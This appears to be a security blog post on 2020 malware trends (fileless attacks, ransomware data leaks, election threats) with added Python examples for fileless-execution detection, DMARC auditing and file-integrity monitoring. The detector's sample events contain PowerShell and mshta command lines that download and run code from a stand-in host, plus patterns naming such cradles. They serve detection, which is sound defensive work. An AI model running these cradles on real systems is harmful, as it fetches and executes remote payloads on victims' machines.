Malware closed out 2019 on a strong note. According to AV-TEST, malware authors’ efforts throughout the year helped push the total number of known malware samples above one billion. This development wouldn’t have been possible without the vigor malware authors exhibited in the fall of 2019. Indeed, after detecting 8.5 million new samples in June and 9.56 million the following month, AV-TEST saw the monthly total jump above 13 million in August. That rate of detection had not faltered at the time of writing: after peaking in September at 17.70 million, the monthly total has remained above 15 million, with the exception of October at 13.52 million samples.
AV-TEST’s findings paint a picture of a threat landscape flooded with malware. While threat actors can use these samples to get up to trouble in any old way, it’s likely that more and more criminals will flock to certain channels rather than others over the coming year. Here are three such trends that organizations should keep an eye on in 2020.
1. Fileless Attacks Will Continue to Become More Commonplace
We have two main reasons to anticipate that fileless malware attacks will become more commonplace in 2020. First, the security community observed an increase in fileless attacks over the previous year. Trend Micro noted in September 2019 that detections of fileless attacks across H1 2019 had increased by 265 percent over the previous year, for instance. A few months later, Bleeping Computer reported that threat actors had begun abusing the Remote Desktop Protocol (RDP) as a new technique to target organizations with fileless malware attacks. Nefarious individuals will likely continue to come up with other tactics in the coming months.
Second, security researchers tracked more categories of digital threats beginning to incorporate fileless techniques into their attack chains. For instance, Malwarebytes revealed in November 2019 that a growing number of exploit kits had begun using fileless attacks instead of dropping their payloads onto a disk. Researchers have also spotted threat actors pairing fileless tactics with SOREBRECT, GandCrab, FTCODE and other ransomware families over the past few years. In an effort to evade detection by signature-based tools, malware authors will likely continue to incorporate these types of capabilities into their creations.
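Because a fileless payload never lands on disk, the artifact left for defenders is usually the command line of the process that pulled it into memory. The following is an added example (not code from the original article or from any vendor it cites) of that kind of detection logic: it walks a handful of constructed process-creation events shaped like Sysmon Event ID 1, decodes PowerShell's -EncodedCommand argument, and flags the in-memory download-and-invoke pattern and scripting hosts launched against a remote URL. The hosts, pids and the payload.invalid domain are made up for illustration.

```python
"""Flag process-creation events whose command lines show fileless execution patterns."""
import base64
import re
from typing import Dict, List, Optional


def _encode_ps(script: str) -> str:
    """PowerShell's -EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events in the shape of Sysmon Event ID 1 (process creation).
# Pids, paths and the payload.invalid domain are made up; none of this is captured telemetry.
SAMPLE_EVENTS: List[dict] = [
    {"pid": 4101, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -enc "
                + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://payload.invalid/s.ps1')")},
    {"pid": 4102, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -c \"IEX (iwr 'https://payload.invalid/a').Content\""},
    {"pid": 4103, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://payload.invalid/launch.hta"},
    {"pid": 4104, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1"},
    {"pid": 4105, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\alice\notes.txt"},
]

# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe (prefix matching).
ENCODED_FLAG = re.compile(r"\s-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
DOWNLOAD_CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\bIWR\b|Net\.WebClient",
                             re.IGNORECASE)
INVOKE_EXPR = re.compile(r"\bIEX\b|Invoke-Expression", re.IGNORECASE)
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
# Signed Windows binaries that will happily execute content fetched from a URL.
URL_LAUNCHERS = {"mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe"}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand script, or None if there is none or it is malformed."""
    match = ENCODED_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event: dict) -> List[str]:
    """Return the list of fileless-execution indicators that fire for one event (empty if none)."""
    reasons: List[str] = []
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmdline = event["cmdline"]
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("powershell_encoded_command")
    # Match the cradle against the visible command line plus whatever the encoding was hiding.
    text = cmdline if decoded is None else cmdline + " " + decoded
    if DOWNLOAD_CRADLE.search(text) and INVOKE_EXPR.search(text):
        reasons.append("download_and_invoke_in_memory")
    if image in URL_LAUNCHERS and REMOTE_URL.search(cmdline):
        reasons.append(f"{image}_with_remote_url")
    return reasons


def scan(events: List[dict]) -> Dict[int, List[str]]:
    """Map pid -> indicators for every event that fired at least one rule."""
    return {e["pid"]: reasons for e in events if (reasons := analyze_event(e))}


if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE_EVENTS).items():
        print(pid, ", ".join(reasons))
```

Note that the benign -ExecutionPolicy Bypass -File run (pid 4104) is deliberately not flagged: on its own a relaxed execution policy is routine in administration scripts, and alerting on it produces noise rather than detections. Decoding the encoded command before matching is what lets the same cradle rule cover both the plain and the obfuscated invocation.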
2. More Ransomware Families Will Begin Doxing Victims
Ransomware is bad enough when it encrypts a victim’s data and demands a ransom payment in exchange for the decryption key. Not all ransomware families stop there, however. Some families have specifically begun punishing users who don’t fulfill their ransom demands.
Maze was the ransomware family that instituted this change. In November 2019, Bleeping Computer revealed that the Maze group had published approximately 700 MB of data stolen from Allied Universal. The group said that this information amounted to about 10% of the files stolen from the facility services company. It also stated that it would release the rest if it didn’t receive a ransom payment.
In publishing Allied Universal’s data online, the Maze group apparently inspired other ransomware families to follow suit. Sodinokibi took the lead by leaking 337 MB of data stolen from Artech Information Systems in early January 2020. Just a few days later, news emerged of Nemty and its plans to create a website on which it would begin leaking non-paying victims’ information. That was about a week or so before the security community learned of BitPyLock authors’ threats to begin leaking their victims’ files.
It stands to reason that even more ransomware families will use this information-stealing technique—or at least threaten to do so—as the year progresses.
3. Persistent Security Threats for the Upcoming U.S. Election
Infosec professionals and election security officials alike are concerned about the security of the 2020 U.S. presidential election. As reported by TechCrunch, Valimail examined the three largest electoral districts in each U.S. state to evaluate their defenses against email spoofing attacks. The digital security solutions provider found that admins had protected just 10 of the 187 election-related domains with DMARC, a protocol that lets receiving mail servers verify (via SPF and DKIM) that a message’s From domain is genuine and tells them whether to quarantine or reject mail that fails that check. Without this type of protection, threat actors can trick election officials into opening a malicious file attachment or visiting a suspicious website.
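A DMARC record only protects a domain if it exists, is well formed and carries an enforcing policy, so a domain audit like Valimail's has to look past "is there a record" to "what does the record actually do". The following is an added example (not code from the original article or from Valimail) of that assessment: it takes the TXT answers a resolver would return for _dmarc.<domain>, discards records that are not DMARC records, applies the RFC 7489 rule that more than one DMARC record means none is used, and classifies each domain by the policy it really enforces. The domain names and records are constructed for illustration; a real audit would obtain them with a DNS TXT lookup.

```python
"""Classify the protection that a domain's published DMARC record actually provides."""
from typing import Dict, List

# Constructed sample answers for _dmarc.<domain> TXT lookups. These are illustrative only;
# a real audit would replace this map with the resolver's answers.
SAMPLE_TXT_RECORDS: Dict[str, List[str]] = {
    "votes.example": ["v=DMARC1; p=reject; rua=mailto:dmarc@votes.example"],
    "county-elections.example": ["v=DMARC1; p=none; rua=mailto:reports@county-elections.example"],
    "ballots.example": ["v=DMARC1; p=quarantine; pct=25"],
    "registrar.example": ["google-site-verification=abc123"],   # TXT present, but no DMARC record
    "precinct.example": [],                                       # nothing published at all
    "twice.example": ["v=DMARC1; p=reject", "v=DMARC1; p=none"],  # two records: receivers use neither
}

VALID_POLICIES = {"none", "quarantine", "reject"}


def parse_dmarc(txt: str) -> Dict[str, str]:
    """Split 'tag=value; tag=value' into a dict. Returns {} unless the first tag is exactly v=DMARC1."""
    parts = [p.strip() for p in txt.split(";")]
    if not parts or parts[0] != "v=DMARC1":
        return {}
    tags: Dict[str, str] = {}
    for part in parts:
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def assess(txt_records: List[str]) -> str:
    """Return one of: missing, invalid, monitor-only, quarantine-partial, reject-partial, quarantine, reject."""
    dmarc = [r for r in txt_records if r.strip().startswith("v=DMARC1")]
    if not dmarc:
        return "missing"
    if len(dmarc) > 1:
        return "invalid"          # RFC 7489 s6.6.3: multiple DMARC records -> policy discovery fails
    tags = parse_dmarc(dmarc[0])
    policy = tags.get("p", "").lower()
    if policy not in VALID_POLICIES:
        return "invalid"          # the p tag is required
    if policy == "none":
        return "monitor-only"     # reports are sent, but spoofed mail is still delivered
    pct = tags.get("pct", "100")  # pct defaults to 100 when absent
    if not pct.isdigit() or int(pct) < 100:
        return f"{policy}-partial"  # sampling leaves a share of failing mail unfiltered
    return policy


def summarize(records: Dict[str, List[str]]) -> Dict[str, int]:
    """Count domains per verdict, the shape of result a district-by-district survey reports."""
    counts: Dict[str, int] = {}
    for txt in records.values():
        verdict = assess(txt)
        counts[verdict] = counts.get(verdict, 0) + 1
    return counts


def enforcing_domains(records: Dict[str, List[str]]) -> List[str]:
    """Domains whose full mail stream is quarantined or rejected on DMARC failure."""
    return sorted(d for d, txt in records.items() if assess(txt) in ("quarantine", "reject"))


if __name__ == "__main__":
    for domain, txt in SAMPLE_TXT_RECORDS.items():
        print(f"{domain:28s} {assess(txt)}")
    print(summarize(SAMPLE_TXT_RECORDS))
```

The distinction between "monitor-only" and an enforcing policy is the one that matters operationally: p=none yields aggregate reports that are useful while rolling DMARC out, but it asks receivers to deliver spoofed mail as usual, so a domain in that state is no better defended against the phishing scenario described above than one with no record.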
The Cybersecurity and Infrastructure Security Agency (CISA) is concerned about this possibility. In particular, it’s worried that malicious actors could use ransomware to lock up and/or destroy states’ voter registration databases. That explains why CISA announced its intention in August 2019 to create a program for helping states protect those databases.
“Recent history has shown that state and county governments and those who support them are targets for ransomware attacks,” said CISA Director Christopher Krebs, as quoted by Reuters. “That is why we are working alongside election officials and their private sector partners to help protect their databases and respond to possible ransomware attacks.”
Beyond that, malicious actors will likely use interest around the election to conduct politically themed malware attacks. It happened back in 2016 with the CIA Election AntiCheat Control. In November 2019, Cisco Talos researchers observed something similar when they came across the “Donald Trump Screen of Death.” No doubt these types of attacks will continue.
Defending Against Malware in 2020
The trends discussed above highlight the need for organizations to defend themselves against a malware infection. They can do so by investing in a solution that both provides detailed reports about relevant system changes and uses VM sandboxing to examine questionable file behavior.
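The "detailed reports about relevant system changes" part of that defense is, at its core, file integrity monitoring: record a trusted baseline of what is on disk, take a fresh snapshot later, and report exactly what was added, removed, altered or re-permissioned. The following is an added example (not code from the original article or from any product it alludes to) that does this for a directory tree. It builds a small constructed tree in a temporary directory, takes a baseline, simulates four kinds of change, and returns the report; the file names and contents are made up.

```python
"""Minimal file-integrity baseline and change report over a directory tree."""
import hashlib
import os
import stat
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple

# (sha256 hex digest, size in bytes, permission bits)
Entry = Tuple[str, int, int]


def snapshot(root: str) -> Dict[str, Entry]:
    """Hash every regular file under root, keyed by its POSIX-style path relative to root."""
    result: Dict[str, Entry] = {}
    root_path = Path(root)
    for path in sorted(root_path.rglob("*")):
        if path.is_symlink() or not path.is_file():
            continue  # directories and symlinks are not hashed; links are recorded via their target
        st = path.stat()
        digest = hashlib.sha256(path.read_bytes()).hexdigest()
        result[path.relative_to(root_path).as_posix()] = (digest, st.st_size, stat.S_IMODE(st.st_mode))
    return result


def diff_snapshots(before: Dict[str, Entry], after: Dict[str, Entry]) -> Dict[str, List[str]]:
    """Compare two snapshots and bucket every differing path by the kind of change."""
    report: Dict[str, List[str]] = {"added": [], "removed": [], "modified": [], "mode_changed": []}
    for path in sorted(set(before) | set(after)):
        if path not in before:
            report["added"].append(path)
        elif path not in after:
            report["removed"].append(path)
        else:
            old, new = before[path], after[path]
            if old[0] != new[0] or old[1] != new[1]:
                report["modified"].append(path)       # content differs
            elif old[2] != new[2]:
                report["mode_changed"].append(path)   # same bytes, different permissions
    return report


def demo() -> Dict[str, List[str]]:
    """Build a constructed sample tree, baseline it, simulate changes, and return the change report."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "bin" / "svc").write_bytes(b"#!/bin/sh\necho service\n")
        (root / "etc").mkdir()
        (root / "etc" / "app.conf").write_text("listen=127.0.0.1\n")
        (root / "etc" / "old.conf").write_text("unused=1\n")
        baseline = snapshot(tmp)

        # Simulated changes: a config edited, a stale file removed, an unexpected file planted,
        # and the service script's permissions changed without touching its contents.
        (root / "etc" / "app.conf").write_text("listen=0.0.0.0\n")
        (root / "etc" / "old.conf").unlink()
        (root / "bin" / "helper").write_bytes(b"\x7fELF constructed placeholder\n")
        os.chmod(root / "bin" / "svc", 0o555)  # write bit removed, execute bit added

        return diff_snapshots(baseline, snapshot(tmp))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind:13s} {paths}")
```

Two design points carry over to a production monitor. The baseline has to be stored somewhere an intruder who owns the host cannot rewrite, or the report only confirms whatever they left behind; and permission changes are tracked separately from content changes because a file whose hash is unchanged but whose mode now grants execution (or setuid) is exactly the kind of "relevant system change" that a content-only check would miss.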